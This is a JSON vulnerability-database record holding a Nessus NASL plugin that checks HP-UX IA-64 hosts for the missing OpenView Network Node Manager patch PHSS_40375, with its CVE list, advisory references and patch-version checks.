"cvss3": {"score": null, "vector": null}, "published": "2009-12-14T00:00:00", "type": "nessus", "title": "HP-UX PHSS_40375 : s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 25", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360", "CVE-2009-0898", "CVE-2009-3845", "CVE-2009-3846", "CVE-2009-3847", "CVE-2009-3848", "CVE-2009-3849", "CVE-2009-4176", "CVE-2009-4177", "CVE-2009-4178", "CVE-2009-4179", "CVE-2009-4180", "CVE-2009-4181"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_40375.NASL", "href": "https://www.tenable.com/plugins/nessus/43143", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_40375. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43143);\n script_version(\"1.39\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\", \"CVE-2009-0898\", \"CVE-2009-3845\", \"CVE-2009-3846\", \"CVE-2009-3847\", \"CVE-2009-3848\", \"CVE-2009-3849\", \"CVE-2009-4176\", \"CVE-2009-4177\", \"CVE-2009-4178\", \"CVE-2009-4179\", \"CVE-2009-4180\", \"CVE-2009-4181\");\n script_xref(name:\"HP\", value:\"emr_na-c01950877\");\n script_xref(name:\"HP\", value:\"emr_na-c02000725\");\n script_xref(name:\"HP\", value:\"SSRT090049\");\n script_xref(name:\"HP\", value:\"SSRT090257\");\n\n script_name(english:\"HP-UX PHSS_40375 : s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 25\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 25 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with the Java Runtime Environment (JRE) and Java\n Developer Kit (JDK) delivered with HP OpenView Network\n Node Manager (OV NNM). These vulnerabilities may allow\n remote unauthorized access, privilege escalation,\n execution of arbitrary code, and creation of a Denial of\n Service (DoS) . (HPSBMA02486 SSRT090049)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2009-0898 (SSRT090101)\n CVE-2009-3845 (SSRT090037, ZDI-CAN-453) CVE-2009-3846\n (SSRT090122, ZDI-CAN-526) CVE-2009-3847 (SSRT090128,\n ZDI-CAN-532) CVE-2009-3848 (SSRT090129, ZDI-CAN-522)\n CVE-2009-3849 (SSRT090130, ZDI-CAN-523) CVE-2009-4176\n (SSRT090131, ZDI-CAN-532) CVE-2009-4177 (SSRT090132,\n ZDI-CAN-538) CVE-2009-4178 (SSRT090133, ZDI-CAN-539)\n CVE-2009-4179 (SSRT090134, ZDI-CAN-540) CVE-2009-4180\n (SSRT090135, ZDI-CAN-542) CVE-2009-4181 (SSRT090164,\n ZDI-CAN-549). (HPSBMA02483 SSRT090257)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?422f4693\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02000725\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?72ecd727\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_40375 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(94, 119, 189, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/26\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23 11.31\", proc:\"ia64\"))\n{\n exit(0, \"The host is not affected since PHSS_40375 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_40375\", \"PHSS_40708\", \"PHSS_41243\", \"PHSS_41607\", \"PHSS_41858\", \"PHSS_42233\", \"PHSS_43047\", \"PHSS_43354\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-CORE\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-IPV6\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PD\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PESA\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVMIB-CONTRIB\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNM-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVRPT-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrMan.OVNNM-RUN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrRtDOC.OVNNM-DOC-REUS\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrRtDOC.OVNNM-ENG-DOC\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVDB-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVEVENT-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVMIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVPMD-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVSNMP-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-EVNT\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-FW\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-SRV\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVEVENTMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVSNMP-MIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVWIN-MAN\", version:\"B.07.50.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}